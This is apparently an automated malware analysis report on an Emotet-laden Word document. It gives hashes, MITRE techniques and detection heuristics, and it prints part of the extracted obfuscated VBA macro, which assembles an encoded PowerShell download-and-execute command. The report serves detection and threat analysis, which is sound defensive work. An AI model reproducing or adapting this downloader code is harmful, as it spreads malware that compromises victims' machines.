Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 ac7124752e441b42…

MALICIOUS

Office (OLE)

114.2 KB Created: 2018-06-21 09:08:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 5516455b01444fa907ef91f30cb128af SHA-1: d8baae5553638d76b44cb97175d3d7537884bd0c SHA-256: ac7124752e441b428ca62558a3f062a84b88589ddc9fa2fa6ea3fb8675fadf02
242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros with an AutoOpen function that calls Shell(). The script attempts to construct a PowerShell command by concatenating strings, likely to download and execute a second-stage payload. The ClamAV detection and the presence of Shell() and AutoOpen heuristics strongly indicate a downloader, consistent with the Emotet family.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6891476-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6891476-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13635 bytes
SHA-256: 82fe9f499b9aeb37c17ce8d7236b622a4035b23da7a8e815a4194adfda6de4ee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GNfciXr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oBKsGPGq"
Function ZVimKZ()
On Error Resume Next
For Each wXsju In chAcU
LmWKb = (SDjJzq * 22397 + 80506 * CInt(UiLZz - CDbl(72313)) * 15081 * Oct(58691))
BVEwH = 5897 + Atn(79090) / 5667 / Round(41080) / 59661 / CInt(HXqBF)
UaqmMC = lNKaHj = OXAjjm
Next
GiafdP = "OwerSH" + "ell " + "ieX(" + Chr(34) + "$(sV 'of" + "s'  '' )" + Chr(34) + " +[" + "STrInG]( '1" + "5x77-81I95>" + "124O96I" + "92O11x22-1" + "1-69!78"
For Each qdYNcB In IltwC
CasaSF = (nEzwis * 60109 + 44482 * CInt(MuNSUs - CDbl(6092)) * 27120 * Oct(21048))
fkWsJY = 96831 + Atn(67372) / 69350 / Round(58713) / 19112 / CInt(iPtlv)
TpqWJ = AWccPw = vTsmi
Next
LqPvlKkJQrR = "J92>6J68>73" + "-65>78-72t9" + "5t11x89t74!69O7" + "9>68t70-16-15" + ">92J64-89x1"
For Each hpEhVC In jQXRwb
Ymfoz = (hwLJQr * 36133 + 8511 * CInt(jdKYvE - CDbl(78929)) * 45122 * Oct(96534))
Qijqwj = 87724 + Atn(13527) / 49869 / Round(60841) / 3698 / CInt(OhaizI)
TzZIb = lCDzr = FnwPjd
Next
zOzYv = "22" + "t114!11J22" + "t11!69O78x92" + "t6-68-73t65" + "-78>72" + "J95H1" + "1>120t82!88"
For Each ksioPF In vYXZjU
chkjH = (YhKLXB * 29587 + 55464 * CInt(iJzHt - CDbl(87318)) * 5877 * Oct(73161))
RNpQs = 87350 + Atn(27475) / 51290 / Round(48909) / 52779 / CInt(ZvvPV)
UlEnVj = zhYmz = ushRCh
Next
XQAQOXQS = "t95H78>7" + "0-" + "5O101-78!9" + "5>5x124V78J73!" + "104I71t66-78" + "!69x95" + "O1" + "6H15I" + "97" + "x88t94t74>6"
For Each lMaLY In qqDoO
ZcqVT = (Hvnvb * 40893 + 49196 * CInt(FGNEu - CDbl(60001)) * 43569 * Oct(20666))
kFmwPk = 55912 + Atn(98852) / 88143 / Round(68563) / 68830 / CInt(wzNLi)
qHHtsz = oEzUzz = EcXHai
Next
ckXJaz = "6>11x2" + "2I11>" + "12x67x95H95>91" + "x17O4H4I" + "79x68>89" + "J68-95x67J" + "82I7" + "6V66I71J88t95" + ">89t74"
For Each wNGXV In aGfJc
XvcpG = (VudOz * 79421 + 20803 * CInt(kkDbq - CDbl(31174)) * 88145 * Oct(86201))
hPRMGU = 80526 + Atn(6356) / 7071 / Round(35764) / 23141 / CInt(iRGGtS)
VjNjjY = EUXWM = nGtLqj
Next
OwBjKbc = "V9" + "1O5O72x68" + "H70!4I" + "71" + "-100J111" + "O70x4I107!67J9" + "5I95J"
For Each WUKdSo In wzwii
KHzFS = (dLiFB * 2802 + 21416 * CInt(hWjAzt - CDbl(4649)) * 25011 * Oct(32304))
PIbHuW = 49794 + Atn(31739) / 92894 / Round(66252) / 72354 / CInt(zqaTT)
mwYCY = GVnmSX = Anspc
Next
NHzpSzvUvN = "91t17" + "I4>4t92J" + "92J92" + "O5!7" + "0t82I91H67!74" + ">70I70I"
For Each anpwfN In aKCfN
DZZBO = (rdjwc * 19853 + 74595 * CInt(PVjth - CDbl(37529)) * 30857 * Oct(27312))
oNotLI = 10867 + Atn(56668) / 18574 / Round(97497) / 87623 / CInt(pkblkv)
zQdOiT = Wkjah = YoMJbw
Next
DMTWa = "68O72H67V7" + "4t5!72" + "O68>70J4!102!" + "106" + "O25I" + "77t121O30>106O" + "4J107V67J95O95" + "-91!17" + "I4>4t92" + "t92-92"
ZVimKZ = GiafdP + LqPvlKkJQrR + zOzYv + XQAQOXQS + ckXJaz + OwBjKbc + NHzpSzvUvN + DMTWa
End Function
Function ZaUUl()
On Error Resume Next
For Each JUbrb In USwrj
rRTAk = (kDZOiN * 72897 + 80125 * CInt(rMwDbN - CDbl(35399)) * 78612 * Oct(50210))
vmOFlc = 54961 + Atn(11567) / 399 / Round(76679) / 10437 / CInt(ZctmO)
VNhqq = lcaBa = krJAs
Next
GnuwowA = "J5!71-" + "66" + ">74H74" + "-88!88>68I7" + "2x66I74I95H78t" + "5x72" + "I68t70!4I9"
For Each CMjFw In LnJVcF
aUitnz = (bEOkI * 95844 + 44929 * CInt(czczd - CDbl(89671)) * 96583 * Oct(62691))
wwwwNv = 21440 + Atn(22374) / 86857 / Round(58349) / 54403 / CInt(cniCw)
qpduz = Gduti = qjFnzm
Next
FKidfMXQuzX = "8-94!24V90I67H7" + "7!104H4>1" + "07H67x95I95>91" + "!1"
For Each VimHG In EsZlO
KfIAi = (tqQzm * 14025 + 26130 * CInt(StCCIj - CDbl(13320)) * 34660 * Oct(54468))
WritG = 90721 + Atn(22295) / 80342 / Round(45480) / 56825 / CInt(QsCzor)
Lqsju = VZzVU = sbFjJH
Next
NFQtm = "7I4I4" + "I95H" + "78>8" + "8!95>5!79O66O89" + "O64" + "!9" + "5x94I66H9" + "1x5" + "t69-71>4-"
For Each KwviN In rfVBa
bWwNGQ = (wloiiz * 91548 + 2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.